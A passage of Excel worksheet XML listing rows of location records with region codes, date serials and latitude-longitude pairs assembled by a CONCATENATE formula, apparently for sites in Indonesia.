      <c r="R3896" t="s">
        <v>12970</v>
      </c>
      <c r="S3896" t="s">
        <v>12940</v>
      </c>
      <c r="T3896" t="s">
        <v>171</v>
      </c>
      <c r="U3896" s="5">
        <v>106252834797</v>
      </c>
      <c r="V3896" s="5" t="s">
        <v>17964</v>
      </c>
      <c r="W3896" s="5">
        <v>-6359384046</v>
      </c>
      <c r="X3896" t="s">
        <v>21695</v>
      </c>
      <c r="Y3896" t="str">
        <f t="shared" si="60"/>
        <v>-6.359384046,106.252834797</v>
      </c>
    </row>
    <row r="3897" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3897">
        <v>297407</v>
      </c>
      <c r="B3897" s="1">
        <v>44454</v>
      </c>
      <c r="C3897" t="s">
        <v>12971</v>
      </c>
      <c r="D3897" t="s">
        <v>22</v>
      </c>
      <c r="E3897" t="s">
        <v>23</v>
      </c>
      <c r="F3897" t="s">
        <v>12972</v>
      </c>
      <c r="G3897" t="s">
        <v>12973</v>
      </c>
      <c r="H3897" t="s">
        <v>26</v>
      </c>
      <c r="I3897" t="s">
        <v>517</v>
      </c>
      <c r="J3897" t="s">
        <v>7171</v>
      </c>
      <c r="L3897" t="s">
        <v>12974</v>
      </c>
      <c r="M3897">
        <v>6472050004</v>
      </c>
      <c r="N3897">
        <v>6472050</v>
      </c>
      <c r="O3897">
        <v>6472</v>
      </c>
      <c r="P3897">
        <v>64</v>
      </c>
      <c r="Q3897" t="s">
        <v>12770</v>
      </c>
      <c r="R3897" t="s">
        <v>7174</v>
      </c>
      <c r="S3897" t="s">
        <v>7175</v>
      </c>
      <c r="T3897" t="s">
        <v>1308</v>
      </c>
      <c r="U3897" s="5">
        <v>117138966322</v>
      </c>
      <c r="V3897" s="5" t="s">
        <v>17965</v>
      </c>
      <c r="W3897" s="5">
        <v>-491865494</v>
      </c>
      <c r="X3897" t="s">
        <v>21696</v>
      </c>
      <c r="Y3897" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.491865494,117.138966322</v>
      </c>
    </row>
    <row r="3898" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3898">
        <v>297433</v>
      </c>
      <c r="B3898" s="1">
        <v>44454</v>
      </c>
      <c r="C3898" t="s">
        <v>12975</v>
      </c>
      <c r="D3898" t="s">
        <v>22</v>
      </c>
      <c r="E3898" t="s">
        <v>23</v>
      </c>
      <c r="F3898" t="s">
        <v>12976</v>
      </c>
      <c r="G3898" t="s">
        <v>12977</v>
      </c>
      <c r="H3898" t="s">
        <v>26</v>
      </c>
      <c r="I3898" t="s">
        <v>882</v>
      </c>
      <c r="J3898" t="s">
        <v>7171</v>
      </c>
      <c r="L3898" t="s">
        <v>12978</v>
      </c>
      <c r="M3898">
        <v>6403040003</v>
      </c>
      <c r="N3898">
        <v>6403040</v>
      </c>
      <c r="O3898">
        <v>6403</v>
      </c>
      <c r="P3898">
        <v>64</v>
      </c>
      <c r="Q3898" t="s">
        <v>12979</v>
      </c>
      <c r="R3898" t="s">
        <v>12980</v>
      </c>
      <c r="S3898" t="s">
        <v>12981</v>
      </c>
      <c r="T3898" t="s">
        <v>1308</v>
      </c>
      <c r="U3898" s="5">
        <v>117082701239</v>
      </c>
      <c r="V3898" s="5" t="s">
        <v>17966</v>
      </c>
      <c r="W3898" s="5">
        <v>-613684665</v>
      </c>
      <c r="X3898" t="s">
        <v>21697</v>
      </c>
      <c r="Y3898" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.613684665,117.082701239</v>
      </c>
    </row>
    <row r="3899" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3899">
        <v>297435</v>
      </c>
      <c r="B3899" s="1">
        <v>44454</v>
      </c>
      <c r="C3899" t="s">
        <v>12982</v>
      </c>
      <c r="D3899" t="s">
        <v>22</v>
      </c>
      <c r="E3899" t="s">
        <v>23</v>
      </c>
      <c r="F3899" t="s">
        <v>12983</v>
      </c>
      <c r="G3899" t="s">
        <v>12984</v>
      </c>
      <c r="H3899" t="s">
        <v>26</v>
      </c>
      <c r="I3899" t="s">
        <v>1359</v>
      </c>
      <c r="J3899" t="s">
        <v>7171</v>
      </c>
      <c r="L3899" t="s">
        <v>12985</v>
      </c>
      <c r="M3899">
        <v>6472031005</v>
      </c>
      <c r="N3899">
        <v>6472031</v>
      </c>
      <c r="O3899">
        <v>6472</v>
      </c>
      <c r="P3899">
        <v>64</v>
      </c>
      <c r="Q3899" t="s">
        <v>12718</v>
      </c>
      <c r="R3899" t="s">
        <v>12685</v>
      </c>
      <c r="S3899" t="s">
        <v>7175</v>
      </c>
      <c r="T3899" t="s">
        <v>1308</v>
      </c>
      <c r="U3899" s="5">
        <v>117125835759</v>
      </c>
      <c r="V3899" s="5" t="s">
        <v>17967</v>
      </c>
      <c r="W3899" s="5">
        <v>-541285878</v>
      </c>
      <c r="X3899" t="s">
        <v>21698</v>
      </c>
      <c r="Y3899" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.541285878,117.125835759</v>
      </c>
    </row>
    <row r="3900" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3900">
        <v>297436</v>
      </c>
      <c r="B3900" s="1">
        <v>44454</v>
      </c>
      <c r="C3900" t="s">
        <v>12986</v>
      </c>
      <c r="D3900" t="s">
        <v>22</v>
      </c>
      <c r="E3900" t="s">
        <v>23</v>
      </c>
      <c r="F3900" t="s">
        <v>12987</v>
      </c>
      <c r="G3900" t="s">
        <v>12988</v>
      </c>
      <c r="H3900" t="s">
        <v>26</v>
      </c>
      <c r="I3900" t="s">
        <v>72</v>
      </c>
      <c r="J3900" t="s">
        <v>7171</v>
      </c>
      <c r="L3900" t="s">
        <v>12989</v>
      </c>
      <c r="M3900">
        <v>6403040003</v>
      </c>
      <c r="N3900">
        <v>6403040</v>
      </c>
      <c r="O3900">
        <v>6403</v>
      </c>
      <c r="P3900">
        <v>64</v>
      </c>
      <c r="Q3900" t="s">
        <v>12979</v>
      </c>
      <c r="R3900" t="s">
        <v>12980</v>
      </c>
      <c r="S3900" t="s">
        <v>12981</v>
      </c>
      <c r="T3900" t="s">
        <v>1308</v>
      </c>
      <c r="U3900" s="5">
        <v>117084489891</v>
      </c>
      <c r="V3900" s="5" t="s">
        <v>17968</v>
      </c>
      <c r="W3900" s="5">
        <v>-605999572</v>
      </c>
      <c r="X3900" t="s">
        <v>21699</v>
      </c>
      <c r="Y3900" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.605999572,117.084489891</v>
      </c>
    </row>
    <row r="3901" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3901">
        <v>297514</v>
      </c>
      <c r="B3901" s="1">
        <v>44454</v>
      </c>
      <c r="C3901" t="s">
        <v>12990</v>
      </c>
      <c r="D3901" t="s">
        <v>22</v>
      </c>
      <c r="E3901" t="s">
        <v>23</v>
      </c>
      <c r="F3901" t="s">
        <v>12991</v>
      </c>
      <c r="G3901" t="s">
        <v>12992</v>
      </c>
      <c r="H3901" t="s">
        <v>26</v>
      </c>
      <c r="I3901" t="s">
        <v>8605</v>
      </c>
      <c r="J3901" t="s">
        <v>7171</v>
      </c>
      <c r="L3901" t="s">
        <v>12993</v>
      </c>
      <c r="M3901">
        <v>6472031002</v>
      </c>
      <c r="N3901">
        <v>6472031</v>
      </c>
      <c r="O3901">
        <v>6472</v>
      </c>
      <c r="P3901">
        <v>64</v>
      </c>
      <c r="Q3901" t="s">
        <v>12994</v>
      </c>
      <c r="R3901" t="s">
        <v>12685</v>
      </c>
      <c r="S3901" t="s">
        <v>7175</v>
      </c>
      <c r="T3901" t="s">
        <v>1308</v>
      </c>
      <c r="U3901" s="5">
        <v>117093991229</v>
      </c>
      <c r="V3901" s="5" t="s">
        <v>17969</v>
      </c>
      <c r="W3901" s="5">
        <v>-575949168</v>
      </c>
      <c r="X3901" t="s">
        <v>21700</v>
      </c>
      <c r="Y3901" t="str">
        <f t="shared" si="60"/>
        <v xml:space="preserve"> -0.575949168,117.093991229</v>
      </c>
    </row>
    <row r="3902" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3902">
        <v>298376</v>
      </c>
      <c r="B3902" s="1">
        <v>44459</v>
      </c>
      <c r="C3902" t="s">
        <v>12995</v>
      </c>
      <c r="D3902" t="s">
        <v>22</v>
      </c>
      <c r="E3902" t="s">
        <v>23</v>
      </c>
      <c r="F3902" t="s">
        <v>12996</v>
      </c>
      <c r="G3902" t="s">
        <v>12997</v>
      </c>
      <c r="H3902" t="s">
        <v>26</v>
      </c>
      <c r="I3902" t="s">
        <v>12998</v>
      </c>
      <c r="J3902" t="s">
        <v>6626</v>
      </c>
      <c r="L3902" t="s">
        <v>12999</v>
      </c>
      <c r="M3902">
        <v>7322050018</v>
      </c>
      <c r="N3902">
        <v>7322050</v>
      </c>
      <c r="O3902">
        <v>7322</v>
      </c>
      <c r="P3902">
        <v>73</v>
      </c>
      <c r="Q3902" t="s">
        <v>13000</v>
      </c>
      <c r="R3902" t="s">
        <v>13001</v>
      </c>
      <c r="S3902" t="s">
        <v>7542</v>
      </c>
      <c r="T3902" t="s">
        <v>6630</v>
      </c>
      <c r="U3902" s="5">
        <v>120510575433</v>
      </c>
      <c r="V3902" s="5" t="s">
        <v>17970</v>
      </c>
      <c r="W3902" s="5">
        <v>-2600607248</v>
      </c>
      <c r="X3902" t="s">
        <v>21701</v>
      </c>
      <c r="Y3902" t="str">
        <f t="shared" si="60"/>
        <v>-2.600607248,120.510575433</v>
      </c>
    </row>
    <row r="3903" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3903">
        <v>298377</v>
      </c>
      <c r="B3903" s="1">
        <v>44459</v>
      </c>
      <c r="C3903" t="s">
        <v>13002</v>
      </c>
      <c r="D3903" t="s">
        <v>22</v>
      </c>
      <c r="E3903" t="s">
        <v>23</v>
      </c>
      <c r="F3903" t="s">
        <v>13003</v>
      </c>
      <c r="G3903" t="s">
        <v>13004</v>
      </c>
      <c r="H3903" t="s">
        <v>26</v>
      </c>
      <c r="I3903" t="s">
        <v>3024</v>
      </c>
      <c r="J3903" t="s">
        <v>6626</v>
      </c>
      <c r="L3903" t="s">
        <v>13005</v>
      </c>
      <c r="M3903">
        <v>7322050018</v>
      </c>
      <c r="N3903">
        <v>7322050</v>
      </c>
      <c r="O3903">
        <v>7322</v>
      </c>
      <c r="P3903">
        <v>73</v>
      </c>
      <c r="Q3903" t="s">
        <v>13000</v>
      </c>
      <c r="R3903" t="s">
        <v>13001</v>
      </c>
      <c r="S3903" t="s">
        <v>7542</v>
      </c>
      <c r="T3903" t="s">
        <v>6630</v>
      </c>
      <c r="U3903" s="5">
        <v>120509684589</v>
      </c>
      <c r="V3903" s="5" t="s">
        <v>17971</v>
      </c>
      <c r="W3903" s="5">
        <v>-2601330709</v>
      </c>
      <c r="X3903" t="s">
        <v>21702</v>
      </c>
      <c r="Y3903" t="str">
        <f t="shared" si="60"/>
        <v>-2.601330709,120.509684589</v>
      </c>
    </row>
    <row r="3904" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3904">
        <v>298378</v>
      </c>
      <c r="B3904" s="1">
        <v>44459</v>
      </c>
      <c r="C3904" t="s">
        <v>13006</v>
      </c>
      <c r="D3904" t="s">
        <v>22</v>
      </c>
      <c r="E3904" t="s">
        <v>23</v>
      </c>
      <c r="F3904" s="3" t="s">
        <v>13007</v>
      </c>
      <c r="G3904" t="s">
        <v>13008</v>
      </c>
      <c r="H3904" t="s">
        <v>26</v>
      </c>
      <c r="I3904" t="s">
        <v>1909</v>
      </c>
      <c r="J3904" t="s">
        <v>6626</v>
      </c>
      <c r="L3904" t="s">
        <v>13009</v>
      </c>
      <c r="M3904">
        <v>7322050018</v>
      </c>
      <c r="N3904">
        <v>7322050</v>
      </c>
      <c r="O3904">
        <v>7322</v>
      </c>
      <c r="P3904">
        <v>73</v>
      </c>
      <c r="Q3904" t="s">
        <v>13000</v>
      </c>
      <c r="R3904" t="s">
        <v>13001</v>
      </c>
      <c r="S3904" t="s">
        <v>7542</v>
      </c>
      <c r="T3904" t="s">
        <v>6630</v>
      </c>
      <c r="U3904" s="5">
        <v>120508947343</v>
      </c>
      <c r="V3904" s="5" t="s">
        <v>17972</v>
      </c>
      <c r="W3904" s="5">
        <v>-2600893272</v>
      </c>
      <c r="X3904" t="s">
        <v>21703</v>
      </c>
      <c r="Y3904" t="str">
        <f t="shared" si="60"/>
        <v>-2.600893272,120.508947343</v>
      </c>
    </row>
    <row r="3905" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3905">
        <v>298379</v>
      </c>
      <c r="B3905" s="1">
        <v>44459</v>
      </c>
      <c r="C3905" t="s">
        <v>13010</v>
      </c>
      <c r="D3905" t="s">
        <v>22</v>
      </c>
      <c r="E3905" t="s">
        <v>23</v>
      </c>
      <c r="F3905" t="s">
        <v>13011</v>
      </c>
      <c r="G3905" t="s">
        <v>13012</v>
      </c>
      <c r="H3905" t="s">
        <v>26</v>
      </c>
      <c r="I3905" t="s">
        <v>492</v>
      </c>
      <c r="J3905" t="s">
        <v>6626</v>
      </c>
      <c r="L3905" t="s">
        <v>13013</v>
      </c>
      <c r="M3905">
        <v>7322050018</v>
      </c>
      <c r="N3905">
        <v>7322050</v>
      </c>
      <c r="O3905">
        <v>7322</v>
      </c>
      <c r="P3905">
        <v>73</v>
      </c>
      <c r="Q3905" t="s">
        <v>13000</v>
      </c>
      <c r="R3905" t="s">
        <v>13001</v>
      </c>
      <c r="S3905" t="s">
        <v>7542</v>
      </c>
      <c r="T3905" t="s">
        <v>6630</v>
      </c>
      <c r="U3905" s="5">
        <v>120520136552</v>
      </c>
      <c r="V3905" s="5" t="s">
        <v>17973</v>
      </c>
      <c r="W3905" s="5">
        <v>-2599228453</v>
      </c>
      <c r="X3905" t="s">
        <v>21704</v>
      </c>
      <c r="Y3905" t="str">
        <f t="shared" si="60"/>
        <v>-2.599228453,120.520136552</v>
      </c>
    </row>
    <row r="3906" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3906">
        <v>298380</v>
      </c>
      <c r="B3906" s="1">
        <v>44459</v>
      </c>
      <c r="C3906" t="s">
        <v>13014</v>
      </c>
      <c r="D3906" t="s">
        <v>22</v>
      </c>
      <c r="E3906" t="s">
        <v>23</v>
      </c>
      <c r="F3906" t="s">
        <v>13015</v>
      </c>
      <c r="G3906" t="s">
        <v>13016</v>
      </c>
      <c r="H3906" t="s">
        <v>26</v>
      </c>
      <c r="I3906" t="s">
        <v>76</v>
      </c>
      <c r="J3906" t="s">
        <v>6626</v>
      </c>
      <c r="L3906" t="s">
        <v>13017</v>
      </c>
      <c r="M3906">
        <v>7322050018</v>
      </c>
      <c r="N3906">
        <v>7322050</v>
      </c>
      <c r="O3906">
        <v>7322</v>
      </c>
      <c r="P3906">
        <v>73</v>
      </c>
      <c r="Q3906" t="s">
        <v>13000</v>
      </c>
      <c r="R3906" t="s">
        <v>13001</v>
      </c>
      <c r="S3906" t="s">
        <v>7542</v>
      </c>
      <c r="T3906" t="s">
        <v>6630</v>
      </c>
      <c r="U3906" s="5">
        <v>120514686094</v>
      </c>
      <c r="V3906" s="5" t="s">
        <v>17974</v>
      </c>
      <c r="W3906" s="5">
        <v>-2600325562</v>
      </c>
      <c r="X3906" t="s">
        <v>21705</v>
      </c>
      <c r="Y3906" t="str">
        <f t="shared" si="60"/>
        <v>-2.600325562,120.514686094</v>
      </c>
    </row>
    <row r="3907" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3907">
        <v>298382</v>
      </c>
      <c r="B3907" s="1">
        <v>44461</v>
      </c>
      <c r="C3907" t="s">
        <v>13018</v>
      </c>
      <c r="D3907" t="s">
        <v>22</v>
      </c>
      <c r="E3907" t="s">
        <v>23</v>
      </c>
      <c r="F3907" t="s">
        <v>13019</v>
      </c>
      <c r="G3907" t="s">
        <v>13020</v>
      </c>
      <c r="H3907" t="s">
        <v>26</v>
      </c>
      <c r="I3907" t="s">
        <v>65</v>
      </c>
      <c r="J3907" t="s">
        <v>6940</v>
      </c>
      <c r="L3907" t="s">
        <v>13021</v>
      </c>
      <c r="M3907">
        <v>1116051018</v>
      </c>
      <c r="N3907">
        <v>1116051</v>
      </c>
      <c r="O3907">
        <v>1116</v>
      </c>
      <c r="P3907">
        <v>11</v>
      </c>
      <c r="Q3907" t="s">
        <v>13022</v>
      </c>
      <c r="R3907" t="s">
        <v>13023</v>
      </c>
      <c r="S3907" t="s">
        <v>13024</v>
      </c>
      <c r="T3907" t="s">
        <v>6945</v>
      </c>
      <c r="U3907" s="5">
        <v>95732767300</v>
      </c>
      <c r="V3907" s="5" t="s">
        <v>17975</v>
      </c>
      <c r="W3907" s="5">
        <v>5000157100</v>
      </c>
      <c r="X3907" t="s">
        <v>21706</v>
      </c>
      <c r="Y3907" t="str">
        <f t="shared" ref="Y3907:Y3970" si="61">CONCATENATE(X3907,",",V3907)</f>
        <v>5.000157100,957.32767300</v>
      </c>
    </row>
    <row r="3908" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3908">
        <v>298385</v>
      </c>
      <c r="B3908" s="1">
        <v>44462</v>
      </c>
      <c r="C3908" t="s">
        <v>13025</v>
      </c>
      <c r="D3908" t="s">
        <v>22</v>
      </c>
      <c r="E3908" t="s">
        <v>23</v>
      </c>
      <c r="F3908" t="s">
        <v>13026</v>
      </c>
      <c r="G3908" t="s">
        <v>13027</v>
      </c>
      <c r="H3908" t="s">
        <v>7978</v>
      </c>
      <c r="I3908" t="s">
        <v>13028</v>
      </c>
      <c r="J3908" t="s">
        <v>6038</v>
      </c>
      <c r="L3908" t="s">
        <v>13029</v>
      </c>
      <c r="M3908">
        <v>1212230006</v>
      </c>
      <c r="N3908">
        <v>1212230</v>
      </c>
      <c r="O3908">
        <v>1212</v>
      </c>
      <c r="P3908">
        <v>12</v>
      </c>
      <c r="Q3908" t="s">
        <v>13030</v>
      </c>
      <c r="R3908" t="s">
        <v>8440</v>
      </c>
      <c r="S3908" t="s">
        <v>8342</v>
      </c>
      <c r="T3908" t="s">
        <v>6043</v>
      </c>
      <c r="U3908" s="5">
        <v>98594911594</v>
      </c>
      <c r="V3908" s="5" t="s">
        <v>17976</v>
      </c>
      <c r="W3908" s="5">
        <v>3592433318</v>
      </c>
      <c r="X3908" t="s">
        <v>21707</v>
      </c>
      <c r="Y3908" t="str">
        <f t="shared" si="61"/>
        <v>3.592433318,985.94911594</v>
      </c>
    </row>
    <row r="3909" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3909">
        <v>298407</v>
      </c>
      <c r="B3909" s="1">
        <v>44467</v>
      </c>
      <c r="C3909" t="s">
        <v>13031</v>
      </c>
      <c r="D3909" t="s">
        <v>22</v>
      </c>
      <c r="E3909" t="s">
        <v>23</v>
      </c>
      <c r="F3909" t="s">
        <v>13032</v>
      </c>
      <c r="G3909" t="s">
        <v>13033</v>
      </c>
      <c r="H3909" t="s">
        <v>7978</v>
      </c>
      <c r="I3909" t="s">
        <v>7983</v>
      </c>
      <c r="J3909" t="s">
        <v>6940</v>
      </c>
      <c r="L3909" t="s">
        <v>13034</v>
      </c>
      <c r="M3909">
        <v>1171021003</v>
      </c>
      <c r="N3909">
        <v>1171021</v>
      </c>
      <c r="O3909">
        <v>1171</v>
      </c>
      <c r="P3909">
        <v>11</v>
      </c>
      <c r="Q3909" t="s">
        <v>13035</v>
      </c>
      <c r="R3909" t="s">
        <v>13036</v>
      </c>
      <c r="S3909" t="s">
        <v>7057</v>
      </c>
      <c r="T3909" t="s">
        <v>6945</v>
      </c>
      <c r="U3909" s="5">
        <v>95329543948</v>
      </c>
      <c r="V3909" s="5" t="s">
        <v>17977</v>
      </c>
      <c r="W3909" s="5">
        <v>5534095580</v>
      </c>
      <c r="X3909" t="s">
        <v>21708</v>
      </c>
      <c r="Y3909" t="str">
        <f t="shared" si="61"/>
        <v>5.534095580,953.29543948</v>
      </c>
    </row>
    <row r="3910" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3910">
        <v>298418</v>
      </c>
      <c r="B3910" s="1">
        <v>44468</v>
      </c>
      <c r="C3910" t="s">
        <v>13037</v>
      </c>
      <c r="D3910" t="s">
        <v>85</v>
      </c>
      <c r="E3910" t="s">
        <v>23</v>
      </c>
      <c r="F3910" t="s">
        <v>13038</v>
      </c>
      <c r="G3910" t="s">
        <v>13039</v>
      </c>
      <c r="H3910" t="s">
        <v>26</v>
      </c>
      <c r="J3910" t="s">
        <v>1170</v>
      </c>
      <c r="K3910" t="s">
        <v>13040</v>
      </c>
      <c r="L3910" t="s">
        <v>13041</v>
      </c>
      <c r="M3910">
        <v>3171020003</v>
      </c>
      <c r="N3910">
        <v>3171020</v>
      </c>
      <c r="O3910">
        <v>3171</v>
      </c>
      <c r="P3910">
        <v>31</v>
      </c>
      <c r="Q3910" t="s">
        <v>7783</v>
      </c>
      <c r="R3910" t="s">
        <v>484</v>
      </c>
      <c r="S3910" t="s">
        <v>108</v>
      </c>
      <c r="T3910" t="s">
        <v>33</v>
      </c>
      <c r="U3910" s="5">
        <v>106825556300</v>
      </c>
      <c r="V3910" s="5" t="s">
        <v>17978</v>
      </c>
      <c r="W3910" s="5">
        <v>-6312863600</v>
      </c>
      <c r="X3910" t="s">
        <v>21709</v>
      </c>
      <c r="Y3910" t="str">
        <f t="shared" si="61"/>
        <v>-6.312863600,106.825556300</v>
      </c>
    </row>
    <row r="3911" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3911">
        <v>298423</v>
      </c>
      <c r="B3911" s="1">
        <v>44468</v>
      </c>
      <c r="C3911" t="s">
        <v>13042</v>
      </c>
      <c r="D3911" t="s">
        <v>22</v>
      </c>
      <c r="E3911" t="s">
        <v>23</v>
      </c>
      <c r="F3911" t="s">
        <v>13043</v>
      </c>
      <c r="H3911" t="s">
        <v>26</v>
      </c>
      <c r="I3911" t="s">
        <v>1651</v>
      </c>
      <c r="J3911" t="s">
        <v>7509</v>
      </c>
      <c r="L3911" t="s">
        <v>13044</v>
      </c>
      <c r="M3911">
        <v>1371070010</v>
      </c>
      <c r="N3911">
        <v>1371070</v>
      </c>
      <c r="O3911">
        <v>1371</v>
      </c>
      <c r="P3911">
        <v>13</v>
      </c>
      <c r="Q3911" t="s">
        <v>13045</v>
      </c>
      <c r="R3911" t="s">
        <v>7518</v>
      </c>
      <c r="S3911" t="s">
        <v>7513</v>
      </c>
      <c r="T3911" t="s">
        <v>7514</v>
      </c>
      <c r="U3911" s="5">
        <v>100355014802</v>
      </c>
      <c r="V3911" s="5" t="s">
        <v>17979</v>
      </c>
      <c r="W3911" s="5">
        <v>-910210469</v>
      </c>
      <c r="X3911" t="s">
        <v>21710</v>
      </c>
      <c r="Y3911" t="str">
        <f t="shared" si="61"/>
        <v xml:space="preserve"> -0.910210469,100.355014802</v>
      </c>
    </row>
    <row r="3912" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3912">
        <v>298472</v>
      </c>
      <c r="B3912" s="1">
        <v>44473</v>
      </c>
      <c r="C3912" t="s">
        <v>13046</v>
      </c>
      <c r="D3912" t="s">
        <v>22</v>
      </c>
      <c r="E3912" t="s">
        <v>23</v>
      </c>
      <c r="F3912" t="s">
        <v>13047</v>
      </c>
      <c r="G3912" t="s">
        <v>13048</v>
      </c>
      <c r="H3912" t="s">
        <v>26</v>
      </c>
      <c r="I3912" t="s">
        <v>193</v>
      </c>
      <c r="J3912" t="s">
        <v>6626</v>
      </c>
      <c r="L3912" t="s">
        <v>13049</v>
      </c>
      <c r="M3912">
        <v>7317091002</v>
      </c>
      <c r="N3912">
        <v>7317091</v>
      </c>
      <c r="O3912">
        <v>7317</v>
      </c>
      <c r="P3912">
        <v>73</v>
      </c>
      <c r="Q3912" t="s">
        <v>13050</v>
      </c>
      <c r="R3912" t="s">
        <v>13051</v>
      </c>
      <c r="S3912" t="s">
        <v>13052</v>
      </c>
      <c r="T3912" t="s">
        <v>6630</v>
      </c>
      <c r="U3912" s="5">
        <v>1201202846</v>
      </c>
      <c r="V3912" s="5" t="s">
        <v>17980</v>
      </c>
      <c r="W3912" s="5">
        <v>-28442343</v>
      </c>
      <c r="X3912" t="s">
        <v>21711</v>
      </c>
      <c r="Y3912" t="str">
        <f t="shared" si="61"/>
        <v>-2.8442343,120.1202846</v>
      </c>
    </row>
    <row r="3913" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3913">
        <v>298474</v>
      </c>
      <c r="B3913" s="1">
        <v>44474</v>
      </c>
      <c r="C3913" t="s">
        <v>13053</v>
      </c>
      <c r="D3913" t="s">
        <v>22</v>
      </c>
      <c r="E3913" t="s">
        <v>23</v>
      </c>
      <c r="F3913" t="s">
        <v>13054</v>
      </c>
      <c r="G3913" t="s">
        <v>13055</v>
      </c>
      <c r="H3913" t="s">
        <v>26</v>
      </c>
      <c r="I3913" t="s">
        <v>137</v>
      </c>
      <c r="J3913" t="s">
        <v>7171</v>
      </c>
      <c r="L3913" t="s">
        <v>13056</v>
      </c>
      <c r="M3913">
        <v>6401080008</v>
      </c>
      <c r="N3913">
        <v>6401080</v>
      </c>
      <c r="O3913">
        <v>6401</v>
      </c>
      <c r="P3913">
        <v>64</v>
      </c>
      <c r="Q3913" t="s">
        <v>13057</v>
      </c>
      <c r="R3913" t="s">
        <v>13058</v>
      </c>
      <c r="S3913" t="s">
        <v>13059</v>
      </c>
      <c r="T3913" t="s">
        <v>1308</v>
      </c>
      <c r="U3913" s="5">
        <v>1163188648</v>
      </c>
      <c r="V3913" s="5" t="s">
        <v>17981</v>
      </c>
      <c r="W3913" s="5">
        <v>-14535799</v>
      </c>
      <c r="X3913" t="s">
        <v>21712</v>
      </c>
      <c r="Y3913" t="str">
        <f t="shared" si="61"/>
        <v>-1.4535799,116.3188648</v>
      </c>
    </row>
    <row r="3914" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3914">
        <v>298476</v>
      </c>
      <c r="B3914" s="1">
        <v>44477</v>
      </c>
      <c r="C3914" t="s">
        <v>13060</v>
      </c>
      <c r="D3914" t="s">
        <v>22</v>
      </c>
      <c r="E3914" t="s">
        <v>23</v>
      </c>
      <c r="F3914" t="s">
        <v>13061</v>
      </c>
      <c r="G3914" t="s">
        <v>13062</v>
      </c>
      <c r="H3914" t="s">
        <v>26</v>
      </c>
      <c r="I3914" t="s">
        <v>1624</v>
      </c>
      <c r="J3914" t="s">
        <v>13063</v>
      </c>
      <c r="M3914">
        <v>3374080010</v>
      </c>
      <c r="N3914">
        <v>3374080</v>
      </c>
      <c r="O3914">
        <v>3374</v>
      </c>
      <c r="P3914">
        <v>33</v>
      </c>
      <c r="Q3914" t="s">
        <v>8491</v>
      </c>
      <c r="R3914" t="s">
        <v>2992</v>
      </c>
      <c r="S3914" t="s">
        <v>1334</v>
      </c>
      <c r="T3914" t="s">
        <v>1134</v>
      </c>
      <c r="U3914" s="5">
        <v>1104560950</v>
      </c>
      <c r="V3914" s="5" t="s">
        <v>17982</v>
      </c>
      <c r="W3914" s="5">
        <v>-69811488</v>
      </c>
      <c r="X3914" t="s">
        <v>21713</v>
      </c>
      <c r="Y3914" t="str">
        <f t="shared" si="61"/>
        <v>-6.9811488,110.4560950</v>
      </c>
    </row>
    <row r="3915" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3915">
        <v>298484</v>
      </c>
      <c r="B3915" s="1">
        <v>44478</v>
      </c>
      <c r="C3915" t="s">
        <v>13064</v>
      </c>
      <c r="D3915" t="s">
        <v>22</v>
      </c>
      <c r="E3915" t="s">
        <v>23</v>
      </c>
      <c r="F3915" t="s">
        <v>13065</v>
      </c>
      <c r="H3915" t="s">
        <v>26</v>
      </c>
      <c r="I3915" t="s">
        <v>517</v>
      </c>
      <c r="J3915" t="s">
        <v>2627</v>
      </c>
      <c r="L3915" t="s">
        <v>13066</v>
      </c>
      <c r="M3915">
        <v>3277030002</v>
      </c>
      <c r="N3915">
        <v>3277030</v>
      </c>
      <c r="O3915">
        <v>3277</v>
      </c>
      <c r="P3915">
        <v>32</v>
      </c>
      <c r="Q3915" t="s">
        <v>12356</v>
      </c>
      <c r="R3915" t="s">
        <v>12357</v>
      </c>
      <c r="S3915" t="s">
        <v>7776</v>
      </c>
      <c r="T3915" t="s">
        <v>42</v>
      </c>
      <c r="U3915" s="5">
        <v>1075562230</v>
      </c>
      <c r="V3915" s="5" t="s">
        <v>17983</v>
      </c>
      <c r="W3915" s="5">
        <v>-68708592</v>
      </c>
      <c r="X3915" t="s">
        <v>21714</v>
      </c>
      <c r="Y3915" t="str">
        <f t="shared" si="61"/>
        <v>-6.8708592,107.5562230</v>
      </c>
    </row>
    <row r="3916" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3916">
        <v>298486</v>
      </c>
      <c r="B3916" s="1">
        <v>44478</v>
      </c>
      <c r="C3916" t="s">
        <v>13067</v>
      </c>
      <c r="D3916" t="s">
        <v>22</v>
      </c>
      <c r="E3916" t="s">
        <v>23</v>
      </c>
      <c r="F3916" t="s">
        <v>13068</v>
      </c>
      <c r="G3916" t="s">
        <v>13069</v>
      </c>
      <c r="H3916" t="s">
        <v>9262</v>
      </c>
      <c r="I3916" t="s">
        <v>13070</v>
      </c>
      <c r="J3916" t="s">
        <v>2615</v>
      </c>
      <c r="L3916" t="s">
        <v>13071</v>
      </c>
      <c r="M3916">
        <v>3404160005</v>
      </c>
      <c r="N3916">
        <v>3404160</v>
      </c>
      <c r="O3916">
        <v>3404</v>
      </c>
      <c r="P3916">
        <v>34</v>
      </c>
      <c r="Q3916" t="s">
        <v>13072</v>
      </c>
      <c r="R3916" t="s">
        <v>13073</v>
      </c>
      <c r="S3916" t="s">
        <v>1855</v>
      </c>
      <c r="T3916" t="s">
        <v>1856</v>
